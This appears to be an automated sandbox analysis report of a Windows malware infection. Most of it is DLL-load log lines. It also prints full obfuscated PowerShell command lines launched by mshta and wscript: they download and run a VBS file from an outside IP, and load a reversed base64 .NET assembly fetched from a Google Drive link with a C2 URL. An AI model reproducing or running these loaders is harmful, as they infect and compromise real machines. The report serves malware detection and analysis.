Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1330054592.0000000007610000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1330430112.0000000007691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: aspnet_regbrowsers.pdb source: wihaduv, 00000011.00000000.1938334004.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, wihaduv.14.dr
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: aspnet_regbrowsers.pdbl source: wihaduv, 00000011.00000000.1938334004.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, wihaduv.14.dr
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1749720181.0000000007210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700046832.00000000046AA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: q6C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.pdb source: powershell.exe, 00000001.00000002.1442591521.0000000004D6E000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"			Jump to behavior

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 